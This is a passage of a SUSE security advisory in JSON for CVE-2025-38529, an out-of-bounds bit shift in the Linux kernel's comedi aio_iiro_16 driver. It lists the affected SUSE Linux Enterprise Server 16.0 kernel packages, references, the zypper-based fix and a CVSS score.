"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: aio_iiro_16: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 0xdcfc) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38529",
"url": "https://www.suse.com/security/cve/CVE-2025-38529"
},
{
"category": "external",
"summary": "SUSE Bug 1248196 for CVE-2025-38529",
"url": "https://bugzilla.suse.com/1248196"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
